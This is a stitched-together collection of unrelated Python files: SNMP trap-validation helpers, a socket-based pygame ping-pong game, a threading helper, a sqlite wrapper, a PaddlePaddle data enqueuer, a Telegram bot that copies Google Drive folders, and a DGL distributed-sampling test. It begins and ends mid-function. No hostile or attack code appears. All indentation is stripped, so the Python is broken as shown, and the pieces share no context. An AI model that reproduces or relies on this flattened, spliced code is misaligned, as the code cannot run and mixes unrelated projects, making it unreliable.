stop_list = Thread(target=ws.close_trap_listner_job, args=(port,))
stop_list.daemon = True
stop_list.start()
stop_list.join()
Utils.testcase_Utils.report_substep_status(status)
return status
def validate_trap(self, system_name, value, oid_string=None, match_oid_op_value_pair="no"):
"""
This method will validate the Received traps from a agent.
Argument:
1. system_name: Agent System name from the data file
2. value: The tarp infromation e.g. 'Administrative State Down'
3. oid_string: MIB string e.g. 'FSS-COMMON-LOG::fssTrapDescription.0'
3. match_oid_op_value_pair: if set as 'yes' it will match both
oid_string and value as a pair. Default value 'no'
:return: Binary True or False
"""
stats = []
status = False
wdesc = "Validate the Received Trap Messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
op_trap = ws.data_repo.get("snmp_trap_messages_{}".format(agent_ip))
if op_trap:
testcase_Utils.pNote("Total No# {} of Trap message(s) Received from {}".format(len(op_trap), agent_ip))
for temp_list in op_trap:
for items in temp_list[4:]:
if match_oid_op_value_pair.lower() == "no":
if value and value in items[1]:
testcase_Utils.pNote("Value# {} is present in: \n# {} = {}".format(value, items[0], items[1]))
stats.append(True)
break
elif oid_string and value:
if oid_string in items[0] and value in items[1]:
testcase_Utils.pNote("OID #{} and Value #{} is present in: \n# {} = {}".format(oid_string, value, items[0], items[1]))
stats.append(True)
break
if True in stats:
break
if True in stats:
break
else:
testcase_Utils.pNote("No Trap Received!", "error")
if True in stats:
status = True
else:
if value and oid_string:
testcase_Utils.pNote("OID #{} and Value #{} is NOT Present!".format(oid_string, value), "error")
else:
testcase_Utils.pNote("Value #{} is NOT present!".format(oid_string, value), "error")
Utils.testcase_Utils.report_substep_status(status)
return status
def show_received_traps(self, system_name):
"""
Retrieve the captured SNMP Trap messages and show them in the console.
Argument:
system_name: Agent system name from data file.
Return: Binary- True or False
"""
status = True
wdesc = "List out the trap messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
sleep(5)
op_trap = ws.data_repo.get("snmp_trap_messages_{}".format(agent_ip))
if op_trap:
testcase_Utils.pNote("Total No# {} of Trap message(s) Received from {}".format(len(op_trap), agent_ip))
for temp_list in op_trap:
ticks = temp_list[0].get("time_stamp")
contextengineid = temp_list[1].get("contextEngineId")
snmpver = temp_list[2].get("SNMPVER")
securityname = temp_list[3].get("securityName")
testcase_Utils.pNote(" --------->>Notification message(Time Stamp:{})<<------- \n From: {}:\n "
"contextEngineId :{}\n SNMPVER :{}\n securityName: {}"
.format(ticks, agent_ip, contextengineid, snmpver, securityname))
testcase_Utils.pNote("--------------")
for items in temp_list[4:]:
testcase_Utils.pNote("{} = {}".format(items[0], items[1]))
else:
testcase_Utils.pNote("No Trap Received from {}!".format(agent_ip), "error")
status = False
Utils.testcase_Utils.report_substep_status(status)
return status
def browse_mib(self, mib_filepath, mib_filename, browse='yes'):
"""
Browse the MIB File/single or multiple
:param mib_filepath: Mib file path of the git url or abs file path
:param mib_filename: MIB file name
:param browse: Default value is 'yes' were only browse the mentioned MIBS mib_filename argument,
if set 'no' will browse all the Mibs in the given Path
:return: True or False
"""
status = True
wdesc = "Browse the MIB File"
Utils.testcase_Utils.pSubStep(wdesc)
oid, label, suffix, mibView, mibBuilder = ws.get_first_node_name(mib_filepath, mib_filename)
temp_modName, nodeDesc, suffix = mibView.getNodeLocation(oid)
while 1:
try:
modName, nodeDesc, suffix = mibView.getNodeLocation(oid)
mibNode, = mibBuilder.importSymbols(modName, nodeDesc)
nodetype = re.search(r"([\w]+)\(", str(mibNode)).group(1)
if browse.lower() == 'yes':
if modName in mib_filename:
if nodetype == 'MibScalar':
testcase_Utils.pNote('%s %s -> %s == %s' % ('$$', nodetype, modName+'::'+nodeDesc+'.0', '.'.join(map(str,(oid)))+'.0'))
else:
testcase_Utils.pNote('** %s -> %s == %s' % (nodetype, modName+'::'+nodeDesc, '.'.join(map(str,(oid)))))
elif browse.lower() == 'no' :
if nodetype == 'MibScalar':
testcase_Utils.pNote('%s %s -> %s == %s' % ('$$', nodetype, modName+'::'+nodeDesc+'.0', '.'.join(map(str,(oid)))+'.0'))
else:
testcase_Utils.pNote('** %s -> %s == %s' % (nodetype, modName+'::'+nodeDesc, '.'.join(map(str,(oid)))))
oid, label, suffix = mibView.getNextNodeName(oid)
except error.SmiError:
break
Utils.testcase_Utils.report_substep_status(status)
return status
def clear_received_traps(self, system_name):
"""
Clear the captured SNMP Trap messages stored in the repository.
Argument:
system_name: Agent system name from data file.
Return: Binary- True or False
"""
status = True
wdesc = "Clear trap messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
agent_ip = socket.gethostbyname(agent_ip)
clear_val = []
ws.data_repo.update({"snmp_trap_messages_{}".format(agent_ip): clear_val})
Utils.testcase_Utils.report_substep_status(status)
return status
|
pingpong.py
|
import socket
import os
import threading
import random
import sys
import pygame
class PingPongexception(Exception):
pass
class Server:
def __init__(self):
self.HOST = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.PORT = 12000
self.hostName = socket.gethostname()
self.hostAddress = socket.gethostbyname(self.hostName)
def openServer(self):
server_address = (self.hostAddress, self.PORT)
try:
self.HOST.bind(server_address)
self.HOST.listen(1)
print("Server is open")
return 0
except IndexError:
print(server_address, "is not valid")
return 1
except OSError:
print(server_address, "is already in use")
return 2
class Client:
def __init__(self):
self.HOST = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.hostName = socket.gethostname()
self.hostAddress = socket.gethostbyname(self.hostName)
self.IP=self.PORT=None
def connect(self):
while True:
self.IP = input("Address: ") # self.hostAddress
self.PORT = int(input("Port: ")) # self.PORT
try:
self.HOST.connect((self.IP, self.PORT))
print("Connected to", (self.IP, self.PORT))
break
except ConnectionRefusedError:
print(self.IP+':'+str(self.PORT), "refused to connect")
except IndexError:
print(self.IP+':'+str(self.PORT), "is not valid")
except OSError:
print(self.IP+':'+str(self.PORT), "is not valid")
def showInfo(port):
hostName = socket.gethostname()
hostAddress = socket.gethostbyname(hostName)
print("Host Name:", hostName, "\n-----------------------")
print("Your IP:", hostAddress)
print("Your PORT:", port, "\n-----------------------")
def CommandLine():
defaultport = 12000
if sys.platform=='win32':
os.system("cls")
else:
os.system("clear")
showInfo(defaultport)
def Prompt():
connection = Server()
while True:
command = input("pingpongshell> ")
if command == "openserver":
con=connection.openServer()
if con==0:
while True:
client, address = connection.HOST.accept()
if client: # if client connected
print("Connected by", address)
return connection.HOST, client
elif command == "connect":
connection = Client()
connection.connect()
return connection.HOST, False
elif command == "exit" or command == "quit":
res="The user exited the shell."
raise PingPongexception(res)
elif command == "help":
print("""Commands:
openserver - Opens a server
connect - Connects to an existing server
exit/quit - Exits the shell
help - Prints this help page
""")
else:
print("Command '" + command + """' not found
Type 'help' for help.""")
class Ball:
def __init__(self, surface):
self.radius = 10
self.interface = surface
self.WIDTH, self.HEIGHT = pygame.display.get_surface().get_size()
self.location = [self.WIDTH // 2, self.HEIGHT // 2]
step = 5
self.speed = [random.choice((step, -step)), random.choice((step, -step))]
self.player_point = 0
def isCollision(self, player, competitor, top, bottom, left, right):
if self.location[0] <= left + self.radius:
self.speed[0] = -self.speed[0]
elif self.location[0] >= right - self.radius:
self.speed[0] = -self.speed[0]
self.player_point += 1
elif self.location[1] <= top + self.radius or self.location[1] >= bottom - self.radius:
self.speed[1] = -self.speed[1]
elif self.location[0] <= player.location[0] + player.WIDTH + self.radius:
if player.location[1] <= self.location[1] <= player.location[1] + player.HEIGHT:
self.speed[0] = -self.speed[0]
elif self.location[0] >= competitor.location[0] - self.radius:
if competitor.location[1] <= self.location[1] <= competitor.location[1] + competitor.HEIGHT:
self.speed[0] = -self.speed[0]
def render(self):
WHITE = (255, 255, 255)
pygame.draw.circle(self.interface, WHITE, self.location, self.radius)
class Player:
def __init__(self, surface):
self.WIDTH, self.HEIGHT = 10, 100
self.location = [30, 30]
self.interface = surface
self.speed = 5
self.point = 0
self.reqhaserrors=0
def sendingRequest(self, host, ball_location):
try:
location = "%s %s %s %s" % (self.location[1], ball_location[0], ball_location[1], self.point)
host.sendall(location.encode("utf-8"))
except ConnectionResetError:
print("The competitor disconnected")
self.reqhaserrors=1
except ConnectionAbortedError:
print("The competitor has issues with their thread")
self.reqhaserrors=2
except BrokenPipeError:
print("The competitor disconnected")
self.reqhaserrors=1
except IndexError:
print("The competitor disconnected")
self.reqhaserrors=1
def render(self):
white= (255, 255, 255)
pygame.draw.rect(self.interface, white, (self.location[0], self.location[1], self.WIDTH, self.HEIGHT))
class Competitor:
def __init__(self, surface):
self.WIDTH, self.HEIGHT = 10, 100
self.location = [970, 30]
self.interface = surface
self.speed = 5
self.ball_location = [10, 10]
self.point = 0
self.reqhaserrors=0
def handlingRequest(self, client):
try:
data_received = client.recv(128).decode("utf-8")
location = data_received.split()
self.location[1] = int(location[0])
self.ball_location[0] = 500 + (500 - int(location[1]))
self.ball_location[1] = int(location[2])
self.point = int(location[3])
except ConnectionResetError:
print("The competitor disconnected")
self.reqhaserrors=1
except ConnectionAbortedError:
print("The competitor has issues with their thread")
self.reqhaserrors=2
except BrokenPipeError:
print("The competitor disconnected")
self.reqhaserrors=1
except IndexError:
print("The competitor disconnected")
self.reqhaserrors=1
def render(self):
white = (255, 255, 255)
pygame.draw.rect(self.interface, white, (self.location[0], self.location[1], self.WIDTH, self.HEIGHT))
class PingPong:
init_dir=os.path.dirname(__file__)
def __init__(self):
self.WIDTH, self.HEIGHT = 1000, 500
self.screen = None
def scoreBoard(self, player_point, competitor_point):
GREY = (128, 128, 128)
MIDDLE = [self.WIDTH // 2, self.HEIGHT // 2]
player_point = str(player_point)
competitor_point = str(competitor_point)
font = os.path.join(PingPong.init_dir,"cour.ttf")
size = 48
render_font = pygame.font.Font(font, size)
renderPlayerPoint = render_font.render(player_point, True, GREY)
renderCompetitorPoint = render_font.render(competitor_point, True, GREY)
self.screen.blit(renderPlayerPoint, (MIDDLE[0] - 100, MIDDLE[1] - 25))
self.screen.blit(renderCompetitorPoint, (MIDDLE[0] + 50, MIDDLE[1] - 25))
def start(self):
pygame.init()
if sys.platform=='win32':
icon = pygame.image.load("icon.png")
else:
icon = pygame.image.load(os.path.join(PingPong.init_dir,"icon.png"))
pygame.display.set_icon(icon)
frame = pygame.time.Clock()
FPS = 60
host, server = Prompt()
self.screen = pygame.display.set_mode((self.WIDTH, self.HEIGHT))
if server: # server
pygame.display.set_caption("Ping Pong ! Server")
host = server
else: # client
pygame.display.set_caption("Ping Pong ! Client")
gameOver = False
player = Player(self.screen)
competitor = Competitor(self.screen)
ball = Ball(self.screen)
BLACK = (0, 0, 0)
TOP, BOTTOM, LEFT, RIGHT = 0, self.HEIGHT, 0, self.WIDTH
while not gameOver:
self.screen.fill(BLACK)
for event in pygame.event.get():
if event.type == pygame.QUIT:
gameOver = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameOver = True
# player moving
moving = pygame.key.get_pressed()
if moving[pygame.K_w] or moving[pygame.K_a] or moving[pygame.K_UP] or moving[pygame.K_RIGHT]:
player.location[1] -= player.speed
elif moving[pygame.K_s] or moving[pygame.K_d] or moving[pygame.K_DOWN] or moving[pygame.K_LEFT]:
player.location[1] += player.speed
if player.location[1] <= TOP:
player.location[1] = TOP
elif player.location[1] >= BOTTOM - player.HEIGHT:
player.location[1] = BOTTOM - player.HEIGHT
# if this device host is server
if server:
# if ball is collision
ball.location[0] += ball.speed[0]
ball.location[1] += ball.speed[1]
else:
ball.location = competitor.ball_location
ball_parameters = (player, competitor, TOP, BOTTOM, LEFT, RIGHT)
ball_collision = threading.Thread(target=ball.isCollision, args=ball_parameters)
handling = threading.Thread(target=competitor.handlingRequest, args=(host,))
sending = threading.Thread(target=player.sendingRequest, args=(host, ball.location))
handling.start()
sending.start()
ball_collision.start()
if (competitor.reqhaserrors or player.reqhaserrors):
break
player.point = ball.player_point
self.scoreBoard(player.point, competitor.point)
ball.render()
player.render()
competitor.render()
frame.tick(FPS)
pygame.display.update()
host.close()
pygame.quit()
if __name__ == "__main__":
n=PingPong()
CommandLine()
while True:
n.start()
|
utils.py
|
import threading
def run_in_thread(fn):
def run(*k, **kw):
t = threading.Thread(target=fn, args=k, kwargs=kw)
t.start()
return run
|
db.py
|
import functools
import sqlite3
import threading
from threading import Thread
from typing import Callable, Dict, Union
from util.types import Function
class Database(object):
"""Database wrapper."""
def __init__(self, path, debug=False):
# type: (str) -> None
self.path = path
self.conn = sqlite3.connect(path, check_same_thread=False)
# multithreading is only safe when Database.lock() is used
self.cursor = self.conn.cursor()
self._lock = threading.Lock()
self.debug = debug
@staticmethod
def sanitize(s):
# type: (str) -> str
return '"{}"'.format(s.replace("'", "''").replace('"', '""'))
@staticmethod
def desanitize(s):
# type: (str) -> str
return s.replace("''", "'").replace('""', '"').strip('"')
def table_exists(self, table_name):
# type: (str) -> bool
query = 'SELECT COUNT(*) FROM sqlite_master WHERE type="table" AND name=?'
return self.cursor.execute(query, [Database.desanitize(table_name)]).fetchone()[0] > 0
def result_exists(self):
return self.cursor.fetchone() is not None
def max_rowid(self, table):
# type: (str) -> int
query = 'SELECT max(ROWID) FROM {}'.format(table)
return self.cursor.execute(query).fetchone()[0]
def commit(self):
# type: () -> None
self.conn.commit()
def hard_close(self):
# type: () -> None
self.conn.close()
def close(self):
# type: () -> None
self.commit()
self.hard_close()
def lock(self):
# type: () -> None
self._lock.acquire()
def release_lock(self):
# type: () -> None
self._lock.release()
def __enter__(self):
# type: () -> Database
self.lock()
return self
def __exit__(self, exc_type, exc_value, traceback):
# type: () -> None
self.release_lock()
def reset_connection(self):
self.conn = sqlite3.connect(self.path)
self.cursor = self.conn.cursor()
class ApplicationDatabaseException(Exception):
pass
class ApplicationDatabase(object):
"""
`Database` wrapper for an applications DB-API.
Intended to be extended for a specific application.
:ivar name: name of database
:type name: str
:ivar db: low level database object
:type db: Database
:ivar schema: SQl DB schema
:type schema: Dict[str, str]
:ivar exception: Exception class used by DB
:type exception: type(ApplicationDatabaseException)
"""
def __init__(self, schema, path, exception=ApplicationDatabaseException):
# type: (Dict[str, str], Union[str, unicode], type(ApplicationDatabaseException)) -> None
"""Create DB with given name and open low level connection through `Database`"""
self.name = path
self.schema = schema
self.exception = exception # type:
self.db = Database(path)
self._create_tables()
def commit(self):
# type: () -> None
"""Commit DB."""
self.db.commit()
def hard_close(self):
# type: () -> None
"""Close DB without committing."""
self.db.hard_close()
def close(self):
# type: () -> None
"""Close and commit DB."""
self.commit()
self.db.hard_close()
def lock(self):
# type: () -> None
"""Acquire reentrant lock. By locking, multithreaded to DB is safe."""
self.db.lock()
def release_lock(self):
# type: () -> None
"""Release reentrant lock."""
self.db.release_lock()
def __enter__(self):
# type: () -> ApplicationDatabase
"""Enter DB (lock) when entering with statement."""
self.db.__enter__()
return self
def __exit__(self, exc_type, exc_value, traceback):
# type: () -> None
"""Exit DB (release lock) after with statement."""
self.db.__exit__(exc_type, exc_value, traceback)
def _create_tables(self):
# type: () -> None
"""Create all tables according to `DB_SCHEMA`."""
map(self.db.cursor.execute, self.schema.viewvalues())
self.db.commit()
def clear(self):
# type: () -> None
"""Drop and recreate tables."""
# noinspection SqlNoDataSourceInspection
self.db.cursor.executescript(
''.join('DROP TABLE {};'.format(table) for table in self.schema))
self._create_tables()
self.commit()
def reset_connection(self):
self.db.reset_connection()
def run_in_background(self, runnable, name=None):
# type: (Function, str) -> None
"""Run `runnable` in another thread, locking on this DB."""
if name is None:
name = runnable.func_name
else:
runnable.func_name = name
print(threading.current_thread())
@functools.wraps(runnable)
def locking_wrapper():
print('{} is waiting to run in the background'.format(name))
print(threading.current_thread())
with self:
print('{} is running in the background'.format(name))
runnable()
print('{} is done running in the background'.format(name))
thread = Thread(target=locking_wrapper)
thread.background = True
thread.start()
|
data_utils.py
|
# coding: utf8
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This code_local is based on https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
"""
import time
import numpy as np
import threading
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer(object):
"""
Multiple generators
Args:
generators:
wait_time (float): time to sleep in-between calls to `put()`.
"""
def __init__(self, generators, wait_time=0.05):
self.wait_time = wait_time
self._generators = generators
self._threads = []
self._stop_events = []
self.queue = None
self._manager = None
self.workers = 1
def start(self, workers=1, max_queue_size=16):
"""
Start worker threads which add data from the generator into the queue.
Args:
workers (int): number of worker threads
max_queue_size (int): queue size
(when full, threads could block on `put()`)
"""
self.workers = workers
def data_generator_task(pid):
"""
Data generator task.
"""
def task(pid):
if (self.queue is not None
and self.queue.qsize() < max_queue_size):
generator_output = next(self._generators[pid])
self.queue.put((generator_output))
else:
time.sleep(self.wait_time)
while not self._stop_events[pid].is_set():
try:
task(pid)
except Exception:
self._stop_events[pid].set()
break
try:
self._manager = multiprocessing.Manager()
self.queue = self._manager.Queue(maxsize=max_queue_size)
for pid in range(self.workers):
self._stop_events.append(multiprocessing.Event())
thread = multiprocessing.Process(
target=data_generator_task, args=(pid, ))
thread.daemon = True
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
"""
Returns:
bool: Whether the worker theads are running.
"""
# If queue is not empty then still in runing state wait for consumer
if not self.queue.empty():
return True
for pid in range(self.workers):
if not self._stop_events[pid].is_set():
return True
return False
def stop(self, timeout=None):
"""
Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Args:
timeout(int|None): maximum time to wait on `thread.join()`.
"""
if self.is_running():
for pid in range(self.workers):
self._stop_events[pid].set()
for thread in self._threads:
if thread.is_alive():
thread.join(timeout)
if self._manager:
self._manager.shutdown()
self._threads = []
self._stop_events = []
self.queue = None
|
iCopy.py
|
import time, logging, re, chardet
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackQueryHandler,
ConversationHandler,
)
from telegram.ext.dispatcher import run_async
import utils
from utils import (
folder_name,
sendmsg,
restricted,
menu_keyboard,
run,
start_message,
help_message,
mode_message,
task_message,
cplt_message,
pros_message,
cron_task,
killmission,
kill_message,
Mission_Done,
Mission_kill,
kill_message_info,
_get_ver
)
from drive import drive_get
from threading import Timer, Thread
import settings
from process_bar import status
# ############################## Program Description ##############################
# Author : 'FxxkrLab',
# Website: 'https://bbs.jsu.net/c/official-project/icopy/6',
# Code_URL : 'https://github.com/fxxkrlab/iCopy',
# Description= 'Copy GoogleDrive Resources via Telegram BOT',
# Programming Language : Python3',
# License : MIT License',
# Operating System : Linux',
# ############################## Program Description.END ###########################
_Version = 'v0.1.7-beta.3'
# ############################## logging ##############################
# Logging.basicConfig()
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO,
)
logger = logging.getLogger(__name__)
# ############################## Global ##############################
# Conversation Stats
CHOOSE_MODE, LINK_REPLY, TARGET_REPLY = range(3)
# Regex
regex = r"[-\w]{11,33}"
# ############################## Command ##############################
# START INFO & InlineKeyboard with Callback_query.data
@restricted
def start(update, context):
update.effective_message.reply_text(
start_message().format(update.effective_user.first_name),
reply_markup=menu_keyboard(),
)
return CHOOSE_MODE
# HELP 帮助命令提示引导
@restricted
def help(update, context):
update.effective_message.reply_text(help_message())
# ############################## Run_Modes ##############################
# QUICK Mode ,set mode = quick
@restricted
def quick(update, context):
global mode
mode = "quick"
call_mode = update.effective_message.text
if "/quick" == call_mode.strip()[:6]:
update.effective_message.reply_text(
mode_message().format(update.effective_user.first_name, "┋极速转存┋")
)
return request_link(update, context)
if update.callback_query.data == "quick":
update.callback_query.edit_message_text(
mode_message().format(update.effective_user.first_name, "┋极速转存┋")
)
return request_link(update, context)
# COPY Mode ,set mode = copy
@restricted
def copy(update, context):
global mode
mode = "copy"
call_mode = update.effective_message.text
if "/copy" == call_mode.strip()[:5]:
update.effective_message.reply_text(
mode_message().format(update.effective_user.first_name, "┋自定义目录┋")
)
return request_link(update, context)
if update.callback_query.data == "copy":
update.callback_query.edit_message_text(
mode_message().format(update.effective_user.first_name, "┋自定义目录┋")
)
return request_link(update, context)
# ############################## Run_Modes.END ##############################
# Error module
def error(update, context):
"""Log Errors caused by Updates."""
logger.warning('Update "%s" caused error "%s"', update, context.error)
# cancel function
def cancel(update, context):
user = update.message.from_user
logger.info("User %s canceled the conversation.", user.first_name)
update.message.reply_text(
"Bye! {} , 欢迎再次使用 iCopy".format(update.message.from_user.first_name)
)
return ConversationHandler.END
# kill function
def kill(update, context):
Thread(target=killmission).start()
return cancel(update, context)
# version
def _version(update, context):
update.message.reply_text(
"Welcome to use iCopy-Bot\n"
"Current Version : {}\n"
"Latest Version : {}".format(_Version, _get_ver())
)
# ################################ Service #################################
# Request GoogleDrive Shared_Link
def request_link(update, context):
update.effective_message.reply_text("请输入 Google Drive 分享链接")
return LINK_REPLY
# Get Shared_link & request Target_Link
def request_target(update, context):
global mode
global link
link = update.effective_message.text
if "/cancel" == link.strip()[:7]:
return cancel(update, context)
if "quick" == mode:
return recived_mission(update, context)
if "copy" == mode:
update.effective_message.reply_text("请输入转入目标文件夹链接 ")
return TARGET_REPLY
# Get Target_Link(also include Shared_link) & run command judged from mode
def recived_mission(update, context):
global mode
global link
global target
target = update.effective_message.text
if "/cancel" == target.strip()[:7]:
return cancel(update, context)
# extract lid,tid from Link(shared & Target)
lid = "".join(re.findall(regex, link))
tid = "".join(re.findall(regex, target))
# extract Shared_Link folderName
if len(lid) == 28 or len(lid) == 33:
foldername = folder_name(settings.Remote, lid, lid)
elif len(lid) != 28 and len(lid) != 33:
d_id = lid
foldername = drive_get(d_id)['name']
# get Target_folderName under quick mode
if "quick" == mode:
# tid = Pre_Dst_id under quick mode
tid = settings.Pre_Dst_id
if len(tid) == 28 or len(tid) == 33:
target_folder = folder_name(settings.Remote, tid, tid)
elif len(tid) != 28 and len(tid) != 33:
d_id = tid
target_folder = drive_get(d_id)['name']
# get Target_folderName under copy mode
elif "copy" == mode:
if len(tid) == 28 or len(tid) == 33:
target_folder = folder_name(settings.Remote, tid, tid)
elif len(tid) != 28 and len(tid) != 33:
d_id = tid
target_folder = drive_get(d_id)['name']
# sendmsg Mission.INFO
update.effective_message.reply_text(
task_message().format(foldername, lid, target_folder, foldername)
)
# Build Mission Command
commandstr = """{}' JSUSPLIT 'copy' JSUSPLIT '{}:{{{}}}' JSUSPLIT '{}:{{{}}}/{}' JSUSPLIT '{}' JSUSPLIT '{}' JSUSPLIT '{}""".format(
settings.Clone,
settings.Remote,
lid,
settings.Remote,
tid,
foldername,
settings.Run_Mode,
settings.TRANSFER,
settings.CHECKERS,
)
command = commandstr.split("' JSUSPLIT '")
#print(command)
return ConversationHandler.END, copyprocess(update, context, command)
# 任务信息读取处理,并通过异步进程发送 BOT 界面滚动更新信息
@run_async
def copyprocess(update, context, command):
bot = context.bot
message = update.effective_message.reply_text("转存任务准备中...")
mid = message.message_id
percent = ""
percent1 = ""
fps = ""
working = ""
working1 = ""
prog = ""
timeout = 0.1
xtime = 0
for toutput in run(command):
print(toutput.decode("utf-8", "ignore"))
y = re.findall("^Transferred:", toutput.decode("utf-8", "ignore"))
z = re.findall("^ * ", toutput.decode("utf-8", "ignore"))
if y:
val = str(toutput.decode("utf-8", "ignore"))
val = val.split(",")
percent = str(val[1])
statu = val[1].replace("%", "")
fps = str(val[2])
if statu != " -":
statu = int(statu)
prog = status(statu)
if z:
working = str(
toutput.decode("utf-8", "ignore").lstrip("* ").rsplit(":", 2)[0]
)
if working1 != working or percent1 != percent:
if int(time.time()) - xtime > timeout:
cron_task(
sendmsg,
bot,
message.chat_id,
mid,
pros_message(),
percent,
fps,
prog,
working,
)
percent1 = percent
working1 = working
xtime = time.time()
# Fix Mission INFO
if utils.Mission_Done == "finished":
if utils.Mission_kill != "killed":
percent = "100%"
prog = status(100)
cron_task(
sendmsg, bot, message.chat_id, mid, cplt_message(), fps, percent, prog, ""
)
utils.Mission_Done = ""
return help(update, context)
elif utils.Mission_kill == "killed":
cron_task(
sendmsg,
bot,
message.chat_id,
mid,
kill_message(),
kill_message_info(),
"",
"",
"",
)
utils.Mission_Done = ""
utils.Mission_kill = ""
return help(update, context)
# ############################### Main ####################################
def main():
updater = Updater(settings.TOKEN, use_context=True,)
dp = updater.dispatcher
# Entry Conversation
conv_handler = ConversationHandler(
entry_points=[
# Entry Points
CommandHandler("start", start),
CommandHandler("quick", quick),
CommandHandler("copy", copy),
],
states={
CHOOSE_MODE: [
# call function which judged via pattern
CallbackQueryHandler(quick, pattern="quick"),
CallbackQueryHandler(copy, pattern="copy"),
],
LINK_REPLY: [
# get Shared_Link states
CallbackQueryHandler(request_target),
MessageHandler(Filters.text, request_target),
],
TARGET_REPLY: [
# get Target_Link states
CallbackQueryHandler(recived_mission),
MessageHandler(Filters.text, recived_mission),
],
},
fallbacks=[CommandHandler("cancel", cancel),],
)
dp.add_handler(conv_handler, 2)
dp.add_handler(CommandHandler("kill", kill), 1)
dp.add_handler(CommandHandler("ver", _version))
dp.add_handler(CommandHandler("help", help))
dp.add_error_handler(error)
updater.start_polling()
logger.info("Fxxkr LAB iCopy Start")
updater.idle()
if __name__ == "__main__":
main()
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.distributed import sample_neighbors, find_edges
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
import pytest
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_sampling", gpb=gpb)
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
dgl.distributed.exit_client()
return sampled_graph
def start_find_edges_client(rank, tmpdir, disable_shared_mem, eids):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_find_edges.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_find_edges", gpb=gpb)
u, v = find_edges(dist_graph, eids)
dgl.distributed.exit_client()
return u, v
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
def check_rpc_find_edges(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_find_edges'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
eids = F.tensor(np.random.randint(g.number_of_edges(), size=100))
u, v = g.find_edges(eids)
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids)
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
